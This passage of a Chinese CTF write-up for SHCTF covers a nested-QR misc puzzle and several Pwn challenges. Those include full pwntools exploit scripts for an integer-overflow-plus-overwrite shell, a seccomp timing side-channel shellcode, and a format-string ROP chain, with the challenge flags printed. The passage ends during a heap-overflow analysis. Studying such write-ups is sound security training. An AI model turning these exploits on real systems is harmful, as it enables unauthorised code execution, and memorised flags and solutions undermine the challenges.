[\u788e\u7247 01] \u957f\u5ea6: 2819 | \u5934: E4603EDA | \u5c3e: 00374DE4\n[\u788e\u7247 02] \u957f\u5ea6: 2820 | \u5934: E8288ECE | \u5c3e: ABF1D294\n[\u788e\u7247 03] \u957f\u5ea6: 2820 | \u5934: 3E7A816A | \u5c3e: 683C3A60\n[\u788e\u7247 04] \u957f\u5ea6: 2820 | \u5934: 89504E47 | \u5c3e: AD350638\n[\u788e\u7247 05] \u957f\u5ea6: 2819 | \u5934: DDF73DA8 | \u5c3e: 6A7F4B02\n[\u788e\u7247 06] \u957f\u5ea6: 2819 | \u5934: 9FCE75CE | \u5c3e: A74F599E\n[\u788e\u7247 07] \u957f\u5ea6: 2820 | \u5934: 6B8FDC0A | \u5c3e: BC2C6D83\n[\u788e\u7247 08] \u957f\u5ea6: 2820 | \u5934: 983ADE03 | \u5c3e: 9957E8AD\n[\u788e\u7247 09] \u957f\u5ea6: 2819 | \u5934: FC282E9A | \u5c3e: 7583603D\n[\u788e\u7247 10] \u957f\u5ea6: 2820 | \u5934: 7574D422 | \u5c3e: 9357D3A6\n[\u788e\u7247 11] \u957f\u5ea6: 2819 | \u5934: C38F1A70 | \u5c3e: C0DA2380\n[\u788e\u7247 12] \u957f\u5ea6: 2820 | \u5934: EAA94D02 | \u5c3e: 3F03BED0\n[\u788e\u7247 13] \u957f\u5ea6: 2819 | \u5934: 798FEC6B | \u5c3e: AE426082\n[\u788e\u7247 14] \u957f\u5ea6: 2820 | \u5934: 12158EB3 | \u5c3e: 27185E91\n[\u788e\u7247 15] \u957f\u5ea6: 2819 | \u5934: E69DDB44 | \u5c3e: DB424F6C\n\n[!] \u53d1\u73b0 PNG \u6587\u4ef6\u5934\u5728: \u788e\u7247 4\n[!] \u53d1\u73b0 PNG \u6587\u4ef6\u5c3e\u5728: \u788e\u7247 13\n\n\u8fd9\u8bc1\u5b9e\u4e86 1.png \u5230 15.png \u7684\u6587\u4ef6\u540d\u5e76\u4e0d\u662f\u6b63\u786e\u7684\u6587\u4ef6\u987a\u5e8f\uff0c\u800c\u662f\u7f51\u683c\u4f4d\u7f6e\uff081-4\u662f\u7b2c\u4e00\u884c\uff0c5-8\u662f\u7b2c\u4e8c\u884c\uff0c\u4ee5\u6b64\u7c7b\u63a8\uff09\u3002 \u9898\u76ee\u53eb \"Structured Chaos\" (\u6709\u5e8f\u7684\u6df7\u4e71)\uff0c\u4e14\u8d77\u70b9\u662f 4 (\u53f3\u4e0a\u89d2)\uff0c\u7ec8\u70b9\u662f 13 (\u5de6\u4e0b\u89d2)\u3002\u8fd9\u6781\u6709\u53ef\u80fd\u662f\u4e00\u4e2a\u7279\u5b9a\u7684\u51e0\u4f55\u8def\u5f84\u3002<\/code><\/pre>\n\n\n\n
\u987a\u5e8f\u662f\u884c\u4f18\u5148\uff0c\u4ece\u53f3\u5411\u5de6<\/p>\n\n\n\n
4, 3, 2, 1, 8, 7, 6, 5, 12, 11, 10, 9, 15, 14, 13<\/p>\n\n\n\n
\u7ed3\u679c\u51fa\u6765\u8fd9\u4e2a\u9898\u76ee\u65f6\u4e00\u4e2a\u5957\u5a03\u9898\u76ee<\/p>\n\n\n\n
\u601d\u8def\u5c31\u662f:\u4e8c\u7ef4\u7801\u534f\u8bae\u652f\u6301\u5c06\u4e00\u4e2a\u5927\u7684\u6587\u4ef6\u5207\u5206\u6210\u6700\u591a 16 \u4e2a\u788e\u7247\u8fdb\u884c\u4f20\u8f93\u3002\u6bcf\u4e2a\u788e\u7247\u4e2d\u5305\u542b\uff1a\u5e8f\u5217\u53f7\uff1a\u6807\u8bc6\u8be5\u788e\u7247\u5728\u6574\u4f53\u4e2d\u7684\u4f4d\u7f6e\u3002\u6821\u9a8c\u548c\uff1a\u7528\u4e8e\u786e\u4fdd\u6240\u6709\u788e\u7247\u5c5e\u4e8e\u540c\u4e00\u4e2a\u6587\u4ef6\u3002\n\u9898\u76ee\u4e2d\u7684 15 \u679a\u6b8b\u7247\u6b63\u662f\u5229\u7528\u6b64\u534f\u8bae\u3002\u867d\u7136\u5b83\u4eec\u5728 4 times 4\u7684\u7f51\u683c\u4e2d\u770b\u4f3c\u6742\u4e71\u65e0\u7ae0\uff0c\u4f46 zbarimg \u7b49\u4e13\u4e1a\u5de5\u5177\u53ef\u4ee5\u81ea\u52a8\u8bc6\u522b\u8fd9\u79cd\u534f\u8bae\uff0c\u5e76\u6309\u6b63\u786e\u7684\u5b57\u8282\u987a\u5e8f\u76f4\u63a5\u91cd\u7ec4\u51fa\u539f\u59cb\u4e8c\u8fdb\u5236\u6d41\uff0c\u800c\u65e0\u9700\u624b\u52a8\u8ba1\u7b97\u62fc\u63a5\u8def\u5f84\u3002<\/code><\/pre>\n\n\n\n
\u5957\u5a03<\/p>\n\n\n\n
\u89e3\u7801\u540e\u7684\u6570\u636e\u5e76\u975e\u6587\u672c\uff0c\u800c\u662f\u4e00\u4e2a\u5b8c\u6574\u7684 PNG \u6587\u4ef6\u5934 89 50 4E 47\u3002 \u6253\u5f00\u8be5\u56fe\u7247\u540e\uff0c\u5185\u5bb9\u4f9d\u7136\u662f\u4e00\u4e2a\u4e8c\u7ef4\u7801\u3002\u91cd\u590d\u89e3\u7801\u8fc7\u7a0b\u4f1a\u53d1\u73b0\uff0c\u6bcf\u4e00\u5c42\u4e8c\u7ef4\u7801\u7684\u5185\u5bb9\u90fd\u662f\u4e0b\u4e00\u5c42\u56fe\u7247\u7684\u4e8c\u8fdb\u5236\u6d41\u3002\u8fd9\u79cd\u201c\u5957\u5a03\u201d\u7ed3\u6784\u603b\u5171\u5d4c\u5957\u4e86 11 \u5c42\u3002<\/code><\/pre>\n\n\n\n
\u89e3\u9898<\/p>\n\n\n\n
\u8c03\u7528 zbarimg \u83b7\u53d6\u5f53\u524d\u56fe\u7247\u7684\u4e8c\u8fdb\u5236\u8f93\u51fa\u3002\n\u5224\u65ad\u6570\u636e\u5934\u662f\u5426\u4e3a PNG \u7279\u5f81\u7801 89 50 4E 47\u3002\n\u82e5\u662f\u56fe\u7247\uff0c\u5219\u4fdd\u5b58\u5e76\u4f5c\u4e3a\u4e0b\u4e00\u8f6e\u8f93\u5165\uff1b\u82e5\u4e0d\u662f\uff0c\u5219\u89e6\u8fbe\u7ec8\u70b9\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
import subprocess, os\n\ncur, lv = \"Structured Chaos.png\", 0\nwhile True:\n    lv += 1\n    res = subprocess.run([\"zbarimg\", \"-q\", \"--raw\", \"--oneshot\", \"-Sbinary\", cur], capture_output=True)\n    if res.returncode != 0 or not res.stdout: break\n\n    out = f\"lv{lv}.bin\"\n    with open(out, \"wb\") as f: f.write(res.stdout)\n\n    if res.stdout.startswith(b'x89PNG'):\n        cur = f\"lv{lv}.png\"\n        os.rename(out, cur)\n        print(f\"[+] Lv{lv}: {cur} ({len(res.stdout)} bytes)\")\n    else:\n        print(f\"n[!] End: {out}n{subprocess.run(['file', out], capture_output=True, text=True).stdout.strip()}\")\n        break<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5957\u7684\u771f\u591a<\/p>\n\n\n\n
SHCTF{57ruc7ur3d_App3nd_J1gs4w_R3c0n57ruc73d}<\/code><\/pre>\n\n\n\n
\u95ee\u5377\u53cd\u9988<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{th@nK_y0u_FoR_pAr7icipat1n9_in_SHCTF_3rd}<\/code><\/pre>\n\n\n\n
Pwn<\/h1>\n\n\n\n
\u9636\u6bb51<\/strong><\/h2>\n\n\n\n
int_overflow<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u9053\u9898\u662f\u4e00\u9053\u7ed3\u5408\u4e86\u6574\u6570\u6ea2\u51fa\u548c \u6808\u6ea2\u51fa\u7684 Pwn \u9898\u76ee\u3002<\/p>\n\n\n\n
\u6f0f\u6d1e\u5206\u6790<\/p>\n\n\n\n
\u6574\u6570\u6ea2\u51fa (\u7ed5\u8fc7 main \u51fd\u6570\u68c0\u67e5):<\/strong><\/p>\n\n\n\n
\u4ee3\u7801\u903b\u8f91\uff1a<\/p>\n\n\n\n
char v4 = 0; \/\/ 8\u4f4d\u53d8\u91cf (-128 \u5230 127 \u6216 0 \u5230 255)\n\/\/ ...\u5faa\u73af\u4e24\u6b21\u8f93\u5165 v5...\nif ( v5 > 9 ) return 0; \/\/ \u8f93\u5165\u5fc5\u987b <= 9\uff0c\u4f46\u53ef\u4ee5\u662f\u8d1f\u6570\nv4 += v5;\nif ( v4 == 100 ) backdoor(100);<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u76ee\u6807\uff1a\u8ba9 v4 \u7b49\u4e8e 100\u3002\n\u9650\u5236\uff1a\u6bcf\u6b21\u8f93\u5165\u7684\u6570\u4e0d\u80fd\u8d85\u8fc7 9\u3002\u6b63\u5e38\u6b63\u6570\u76f8\u52a0\u6700\u5927\u53ea\u80fd\u662f 9+9=18\uff0c\u65e0\u6cd5\u8fbe\u5230 100\u3002\n\u7ed5\u8fc7\u65b9\u6cd5\uff1a\u5229\u7528 char \u7c7b\u578b\uff088 bit\uff09\u7684\u6ea2\u51fa\u7279\u6027\u3002\u6211\u4eec\u53ef\u4ee5\u8f93\u5165\u8d1f\u6570\u3002<\/code><\/pre>\n\n\n\n
$$
\u5728 8 \u4f4d\u4e8c\u8fdb\u5236\u4e2d\uff0c100 (0x64) \u5bf9\u5e94\u7684\u8865\u7801\u5982\u679c\u662f\u8d1f\u6570\u63a8\u7b97\u7684\u8bdd\uff1aX equiv 100 pmod{256}100 – 256 = -156
$$<\/p>\n\n\n\n
\u6211\u4eec\u9700\u8981\u4e24\u4e2a\u5c0f\u4e8e\u7b49\u4e8e 9 \u7684\u6570\u76f8\u52a0\u7b49\u4e8e -156\u3002\n\n\u4f8b\u5982\uff1a-100 \u548c -56\u3002\n-100 + (-56) = -156\n-156 \u7684\u5341\u516d\u8fdb\u5236\u662f 0xFF64 (\u53d6\u4f4e8\u4f4d\u5373 0x64 = 100)\u3002\n\n\u8fd9\u6837 v4 \u5c31\u4f1a\u53d8\u6210 100\uff0c\u6210\u529f\u8fdb\u5165 backdoor \u51fd\u6570\u3002<\/code><\/pre>\n\n\n\n
\u6808\u6ea2\u51fa (backdoor \u51fd\u6570):<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
char buf[10];      \/\/ \u4f4d\u4e8e rbp-0x1D\nchar command[11];  \/\/ \u4f4d\u4e8e rbp-0x13\uff0c\u5185\u5bb9\u521d\u59cb\u5316\u4e3a \"echo hello\"\n\/\/ ...\nread(0, buf, (unsigned int)(a1 - 80)); \/\/ a1 \u4f20\u5165\u7684\u662f 100\uff0c\u6240\u4ee5\u8bfb\u53d6 20 \u5b57\u8282\nsystem(command);<\/code><\/pre>\n\n\n\n
\u5185\u5b58\u5e03\u5c40<\/strong>\uff1a<\/p>\n\n\n\n
buf<\/code> \u8ddd\u79bb rbp<\/code> \u504f\u79fb 0x1D (29)\u3002command<\/code> \u8ddd\u79bb rbp<\/code> \u504f\u79fb 0x13 (19)\u3002\u4e24\u8005\u8ddd\u79bb\uff1a29 – 19 = 10\u5b57\u8282\u3002<\/p>\n\n\n\n
\u653b\u51fb\u70b9\uff1aread \u5141\u8bb8\u5199\u5165 20 \u5b57\u8282\uff0c\u4f46 buf \u5230 command \u53ea\u6709 10 \u5b57\u8282\u7684\u7a7a\u95f4\u3002\u6211\u4eec\u53ef\u4ee5\u5148\u5199\u5165 10 \u4e2a\u5b57\u8282\u586b\u6ee1 padding\uff0c\u7d27\u63a5\u7740\u5199\u5165 \/bin\/sh \u8986\u76d6\u539f\u672c\u7684 \"echo hello\"\u3002\n\u968f\u540e\u7a0b\u5e8f\u6267\u884c system(command) \u65f6\uff0c\u5c31\u4f1a\u6267\u884c system(\"\/bin\/sh\") \u4ece\u800c\u62ff\u5230 shell\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
from pwn import *\n\ncontext.log_level = 'debug'\ncontext.arch = 'amd64'\n\nip = 'challenge.shc.tf'\nport = 30536\n\nio = remote(ip, port)\n\nio.recvuntil(b\"number1\")\nio.sendline(b\"-100\")\n\nio.recvuntil(b\"number2\")\nio.sendline(b\"-56\")\n\nio.recvuntil(b\"what is your name\")\n\npayload = b'A' * 10 + b'\/bin\/shx00'\n\nio.send(payload)\n\nio.interactive()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{822463dd-e10e-497b-bcf4-794aee6624bf}<\/code><\/pre>\n\n\n\n
execve?orw?<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u9898\u76ee\u5206\u6790\uff1a<\/strong>
\u7a0b\u5e8f\u4e3a 64 \u4f4d ELF\uff0c\u5f00\u542f\u4e86 NX \u4fdd\u62a4\u3002main<\/code> \u51fd\u6570\u903b\u8f91\u5982\u4e0b\uff1a<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6253\u5f00 .\/flag \u6587\u4ef6\u3002\n\u4f7f\u7528 mmap \u5c06 flag \u6587\u4ef6\u5185\u5bb9\u6620\u5c04\u5230\u56fa\u5b9a\u5185\u5b58\u5730\u5740 0x11451000\u3002\n\u8bfb\u53d6\u7528\u6237\u8f93\u5165\u7684 Shellcode \u5230\u5730\u5740 0x11451500\u3002\n\u8c03\u7528 sandbox() \u52a0\u8f7d Seccomp \u6c99\u7bb1\u89c4\u5219\uff08\u7ecf\u6d4b\u8bd5\u7981\u7528\u4e86 write \u7b49\u7cfb\u7edf\u8c03\u7528\uff0c\u53ea\u5141\u8bb8 exit\uff09\u3002\n\u6267\u884c\u7528\u6237\u8f93\u5165\u7684 Shellcode\u3002<\/code><\/pre>\n\n\n\n
\u6f0f\u6d1e\u51fd\u6570\uff1a<\/strong>
main<\/code> \u51fd\u6570\uff1a\u6f0f\u6d1e\u70b9\u5728\u4e8e\u76f4\u63a5\u6267\u884c\u4e86\u7528\u6237\u8f93\u5165\u7684\u4efb\u610f\u673a\u5668\u7801\uff1a((void (*)(void))0x11451500)();<\/code><\/p>\n\n\n\n
\u5229\u7528\u601d\u8def\uff1a<\/strong>
\u7531\u4e8e Seccomp \u7981\u7528\u4e86\u8f93\u51fa\u51fd\u6570\uff08\u5982 write<\/code>\uff09\uff0c\u65e0\u6cd5\u76f4\u63a5\u56de\u663e flag\u3002\u4f46 flag \u5df2\u5b58\u5728\u4e8e\u5df2\u77e5\u5185\u5b58 0x11451000<\/code> \u4e2d\uff0c\u4e14\u5141\u8bb8\u6267\u884c\u8ba1\u7b97\u6307\u4ee4\u548c exit<\/code>\u3002<\/p>\n\n\n\n
\u91c7\u7528 \u57fa\u4e8e\u65f6\u95f4\u7684\u4fa7\u4fe1\u9053\u653b\u51fb<\/strong>\uff1a<\/p>\n\n\n\n
\u6784\u9020 Shellcode \u8bfb\u53d6 flag \u7684\u67d0\u4e00\u4f4d\u5b57\u7b26\u3002\n\u4e0e\u731c\u6d4b\u7684\u5b57\u7b26\u8fdb\u884c\u6bd4\u8f83 (cmp)\u3002\n\u5982\u679c\u76f8\u7b49\uff1a\u6267\u884c\u6b7b\u5faa\u73af (jmp )\uff0c\u5bfc\u81f4\u670d\u52a1\u5668\u8fde\u63a5\u8d85\u65f6\u3002\n\u5982\u679c\u4e0d\u7b49\uff1a\u6267\u884c exit(0)\uff0c\u5bfc\u81f4\u670d\u52a1\u5668\u7acb\u5373\u65ad\u5f00\u8fde\u63a5\u3002\n\u901a\u8fc7 Python \u811a\u672c\u5224\u65ad\u8fde\u63a5\u65ad\u5f00\u7684\u65f6\u95f4\u957f\u77ed\uff0c\u9010\u4f4d\u7206\u7834 Flag\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
from pwn import *\nimport time\nimport string\n\ncontext.log_level = 'error'\n\ndef check_char(index, char_code):\n    try:\n        p = remote('challenge.shc.tf', 30494)\n        p.recvuntil(b'execve? orw?')\n\n        target_addr = 0x11451000 + index\n\n        payload = b''\n        payload += b'x48xbe' + p64(target_addr)\n        payload += b'x8ax06'\n        payload += b'x3c' + bytes([char_code])\n        payload += b'x74x09'\n        payload += b'x48xc7xc0x3cx00x00x00'\n        payload += b'x0fx05'\n        payload += b'xebxfe'\n\n        p.send(payload)\n\n        start_time = time.time()\n        try:\n            p.recvall(timeout=1.5)\n        except:\n            pass\n        end_time = time.time()\n\n        p.close()\n\n        if end_time - start_time > 1.2:\n            return True\n        return False\n\n    except:\n        return False\n\nflag = \"SHCTF{\"\nindex = len(flag)\ncharset = string.ascii_lowercase + string.digits + \"_}\" + string.ascii_uppercase + string.punctuation\n\nprint(f\"[*] Starting Blind Side-Channel Attack...\")\nprint(f\"[*] Known Prefix: {flag}\")\n\nwhile True:\n    found_char = False\n    for char in charset:\n        print(f\"r[*] Trying: {flag}{char}\", end=\"\")\n        if check_char(index, ord(char)):\n            flag += char\n            index += 1\n            found_char = True\n            print(f\"n[+] Found: {flag}\")\n            if char == '}':\n                exit(0)\n            break\n\n    if not found_char:\n        time.sleep(1)<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{1fd60bf1-cb9f-41dd-9559-77dc8267d926}<\/code><\/pre>\n\n\n\n
baby_fmt<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6f0f\u6d1e\u70b9<\/strong>\uff1amain<\/code> \u51fd\u6570\u4e2d\u5b58\u5728 while(1)<\/code> \u5faa\u73af\uff0c\u5faa\u73af\u5185\u8c03\u7528 printf(format)<\/code>\uff0c\u5bfc\u81f4\u65e0\u9650\u6b21\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e<\/strong>\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\/\/ \u6f0f\u6d1e\u4ee3\u7801\u7247\u6bb5\nstrcpy(format, \"text:\");\nwhile ( 1 ) {\n  printf(\"Input your text: \");\n  fgets(&format[5], 256, stdin); \/\/ \u7528\u6237\u8f93\u5165\u62fc\u63a5\u5230 format \u4e2d\n  printf(format);                \/\/ \u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\n}<\/code><\/pre>\n\n\n\n
\u4fdd\u62a4\u673a\u5236\uff1a\n\nFull RELRO\uff1a\u65e0\u6cd5\u4fee\u6539 GOT \u8868\uff08\u5982\u52ab\u6301 printf@got\uff09\u3002\nPIE \u5f00\u542f\uff1a\u4ee3\u7801\u6bb5\u5730\u5740\u968f\u673a\u3002\nNX \u5f00\u542f\uff1a\u6808\u4e0d\u53ef\u6267\u884c\u3002<\/code><\/pre>\n\n\n\n
\u5229\u7528\u903b\u8f91<\/p>\n\n\n\n
\u7531\u4e8e\u65e0\u6cd5\u4fee\u6539 GOT \u8868\uff0c\u4e14 One Gadget \u56e0\u5bc4\u5b58\u5668\u73af\u5883\u9650\u5236\u5bfc\u81f4\u5229\u7528\u5931\u8d25\uff0c\u6700\u7ec8\u65b9\u6848\u91c7\u7528 \u52ab\u6301\u6808\u4e0a\u8fd4\u56de\u5730\u5740<\/strong> \u5e76 \u5199\u5165 ROP Chain<\/strong> \u7684\u65b9\u5f0f\u3002<\/p>\n\n\n\n
1.\u4fe1\u606f\u6cc4\u9732<\/strong><\/p>\n\n\n\n
\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32 %p \u6cc4\u9732\u6808\u4e0a\u6b8b\u7559\u7684 Libc \u5730\u5740 (__libc_start_main+128) \u548c PIE \u5730\u5740 (main \u51fd\u6570\u5730\u5740)\u3002\n\u76ee\u7684\uff1a\u8ba1\u7b97 Libc \u57fa\u5740\uff08\u7528\u4e8e\u8c03\u7528 system \u548c gadgets\uff09\u548c\u7a0b\u5e8f\u57fa\u5740\uff08\u7528\u4e8e\u540e\u7eed\u5224\u5b9a\u6808\u4e0a\u6570\u636e\uff09\u3002<\/code><\/pre>\n\n\n\n
2. \u6cc4\u9732\u6808\u5730\u5740<\/strong><\/p>\n\n\n\n
\u5229\u7528 Libc \u4e2d\u7684\u5168\u5c40\u53d8\u91cf environ\u3002\u8be5\u7b26\u53f7\u5b58\u50a8\u4e86\u4e00\u4e2a\u6307\u5411\u6808\u4e0a\u73af\u5883\u53d8\u91cf\u533a\u7684\u6307\u9488\u3002\n\u64cd\u4f5c\uff1a\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\uff08%s\uff09\u8bfb\u53d6 libc.sym['environ'] \u6307\u5411\u7684\u5185\u5bb9\u3002\n\u76ee\u7684\uff1a\u83b7\u53d6\u6808\u7684\u7edd\u5bf9\u5730\u5740\uff0c\u4f5c\u4e3a\u540e\u7eed\u641c\u7d22\u7684\u57fa\u51c6\u70b9\u3002<\/code><\/pre>\n\n\n\n
3.\u66b4\u529b\u641c\u7d22\u8fd4\u56de\u5730\u5740<\/strong><\/p>\n\n\n\n
\u96be\u70b9\uff1a\u6808\u5e27\u6df1\u5ea6\u53ef\u80fd\u53d8\u5316\uff0c\u65e0\u6cd5\u76f4\u63a5\u786e\u5b9a printf \u8fd4\u56de\u5730\u5740\u76f8\u5bf9\u4e8e environ \u7684\u56fa\u5b9a\u504f\u79fb\u3002\n\n\u64cd\u4f5c\uff1a\n\u4ece\u6cc4\u9732\u7684 environ \u5730\u5740\u5411\u4f4e\u5730\u5740\u65b9\u5411\uff08Stack Growth\u65b9\u5411\uff09\u8fdb\u884c\u66b4\u529b\u626b\u63cf\uff08\u8303\u56f4 0x100 - 0x500\uff09\u3002\n\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u8bfb\u53d6\u6808\u4e0a\u6bcf\u4e2a\u4f4d\u7f6e\u7684\u503c\u3002\n\u5224\u5b9a\u6761\u4ef6\uff1a\u68c0\u67e5\u8bfb\u51fa\u7684\u503c\u662f\u5426\u4f4d\u4e8e\u7a0b\u5e8f\u7684 \u4ee3\u7801\u6bb5\u8303\u56f4\u5185\uff08\u901a\u8fc7 Step 1 \u7684 PIE \u57fa\u5740\u5224\u65ad\uff09\u3002printf \u7684\u8fd4\u56de\u5730\u5740\u5fc5\u7136\u6307\u5411 main \u51fd\u6570\u5185\u90e8\uff08\u504f\u79fb 0x11ee ~ 0x1300\uff09\u3002\n\u9501\u5b9a\u76ee\u6807\uff1a\u53d6\u6240\u6709\u7b26\u5408\u6761\u4ef6\u5730\u5740\u4e2d\u7684\u6700\u5c0f\u503c\uff08min(potential_addrs)\uff09\u3002\u56e0\u4e3a\u6808\u5411\u4f4e\u5730\u5740\u589e\u957f\uff0c\u5730\u5740\u6700\u5c0f\u7684\u90a3\u4e2a\u5373\u4e3a\u5f53\u524d\u6700\u6df1\u5c42\u51fd\u6570\uff08printf\uff09\u7684\u8fd4\u56de\u5730\u5740\u3002<\/code><\/pre>\n\n\n\n
4. ROP Chain \u653b\u51fb<\/strong><\/p>\n\n\n\n
\u7531\u4e8e Full RELRO\uff0c\u76f4\u63a5\u4fee\u6539\u6808\u4e0a\u7684 Return Address \u662f\u6700\u6709\u6548\u7684\u624b\u6bb5\u3002\n\n\u6784\u9020 ROP \u94fe\uff1a\npop rdi; ret\uff1a\u5c06 \/bin\/sh \u5730\u5740\u5f39\u5165 rdi \u5bc4\u5b58\u5668\uff08\u53c2\u65701\uff09\u3002\nptr to \"\/bin\/sh\"\uff1a\u53c2\u6570\u5185\u5bb9\u3002\nret\uff1a\u5355\u7eaf\u7684 ret \u6307\u4ee4\uff0c\u7528\u4e8e \u6808\u5bf9\u9f50 (16-byte alignment)\uff0c\u9632\u6b62 system \u4e2d\u7684 movaps \u6307\u4ee4\u5d29\u6e83\u3002\nsystem\uff1a\u6267\u884c shell\u3002\n\u64cd\u4f5c\uff1a\u5229\u7528 fmtstr_payload \u5c06\u4e0a\u8ff0 ROP \u94fe\u76f4\u63a5\u5199\u5165\u521a\u624d\u5b9a\u4f4d\u5230\u7684 Target Stack Address\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
from pwn import *\nimport time\n\ncontext.log_level = 'debug'\ncontext.arch = 'amd64'\n\nbinary_name = '.\/pwn'\nlibc_name = '.\/libc.so.6'\nip = 'challenge.shc.tf'\nport = 30701\n\nelf = ELF(binary_name, checksec=False)\nlibc = ELF(libc_name, checksec=False)\n\nio = remote(ip, port)\n\nio.recvuntil(b\"Input your text: \")\nio.sendline(b'%41$p|%43$p|')\nio.recvuntil(b\"text:\")\nleaks = io.recvline().strip().split(b'|')\n\nlibc_leak = int(leaks[0], 16)\npie_leak  = int(leaks[1], 16)\n\nlibc.address = libc_leak - 0x29d90\nelf.address = pie_leak - 0x11ee\n\nlog.success(f\"Libc Base: {hex(libc.address)}\")\nlog.success(f\"PIE Base : {hex(elf.address)}\")\n\nenviron_ptr = libc.sym['environ']\npayload = b'%8$s' + b'a'*7 + p64(environ_ptr)\n\nio.recvuntil(b\"Input your text: \")\nio.sendline(payload)\nio.recvuntil(b\"text:\")\nraw_leak = io.recv(6) \nstack_leak = u64(raw_leak.ljust(8, b''))\nlog.success(f\"Stack Leak (environ): {hex(stack_leak)}\")\n\npotential_addrs = []\nfor delta in range(0x100, 0x500, 8):\n    try:\n        curr_ptr = stack_leak - delta\n        payload = b'%8$s' + b'a'*7 + p64(curr_ptr)\n        io.recvuntil(b\"Input your text: \")\n        io.sendline(payload)\n        io.recvuntil(b\"text:\")\n        rec = io.recv(6, timeout=0.1)\n        if len(rec) < 4: continue\n        val = u64(rec.ljust(8, b''))\n\n        offset = val - elf.address\n        if 0x11ee < offset < 0x1300:\n            log.info(f\"Candidate: {hex(curr_ptr)} -> {hex(val)}\")\n            potential_addrs.append(curr_ptr)\n    except: continue\n\nif not potential_addrs:\n    log.error(\"No return address found.\")\n\ntarget_ret_ptr = min(potential_addrs)\nlog.success(f\"Target Stack Address: {hex(target_ret_ptr)}\")\n\npop_rdi = libc.address + 0x2a3e5 \nbin_sh  = next(libc.search(b'\/bin\/sh'))\nsystem  = libc.sym['system']\nret     = libc.address + 0x29cd6 \n\nrop_writes = {\n    target_ret_ptr      : pop_rdi,\n    target_ret_ptr + 8  : bin_sh,\n    target_ret_ptr + 16 : ret,\n    target_ret_ptr + 24 : system\n}\n\npayload = fmtstr_payload(8, rop_writes, numbwritten=16, write_size='short')\nfinal_payload = b'a'*11 + payload\n\nio.recvuntil(b\"Input your text: \")\nio.sendline(final_payload)\n\ntry:\n    io.recvuntil(b\"text:\", timeout=1)\n    io.clean(timeout=0.5)\nexcept: pass\n\ntime.sleep(0.5)\nio.sendline(b\"ls; cat flag; cat \/flag\")\nio.interactive()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{50d09d8b-8c1e-4837-99f3-1e7fef190eb5}<\/code><\/pre>\n\n\n\n
Linklist<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
nc\u8fde\u63a5<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6f0f\u6d1e\u70b9\uff1a<\/strong><\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
create (\u521b\u5efa\u8282\u70b9) \u51fd\u6570\u662f\uff1asub_401212<\/code><\/p>\n\n\n\n
edit (\u7f16\u8f91\u8282\u70b9) \u51fd\u6570\u662f\uff1asub_4013AE<\/code><\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
puts(\"content?\");\nread(0, *(void **)qword_4040B0, 0x20u); \/\/ \u5411\u5f53\u524d\u8282\u70b9\u7684\u5185\u5bb9\u6307\u9488\u5199\u5165 0x20 \u5b57\u8282\n\n\u8fd9\u4e2a\u56fa\u5b9a\u5199\u5165 0x20 \u5b57\u8282\u7684\u884c\u4e3a\u6b63\u662f\u9020\u6210\u5806\u6ea2\u51fa\uff08Heap Overflow\uff09\u7684\u539f\u56e0\uff08\u56e0\u4e3a\u5982\u679c\u521b\u5efa\u65f6\u7533\u8bf7\u7684\u5927\u5c0f\u53ea\u6709 24 \u5b57\u8282\uff0c\u8fd9\u91cc\u5c31\u4f1a\u6ea2\u51fa 8 \u5b57\u8282\u8986\u76d6\u4e0b\u4e00\u4e2a\u5757\u7684\u5934\u90e8\uff09\u3002<\/code><\/pre>\n\n\n\n
\u5bf9\u5e94\u5173\u7cfb<\/strong><\/p>\n\n\n\n
sub_401212<\/code> -> 1. create node<\/strong><\/p>\n\n\n\n
sub_401358<\/code> -> 2. delete node<\/strong><\/p>\n\n\n\n
sub_4012E1<\/code> -> 3. show node<\/strong><\/p>\n\n\n\n
sub_4013AE<\/code> -> 4. edit node<\/strong><\/p>\n\n\n\n
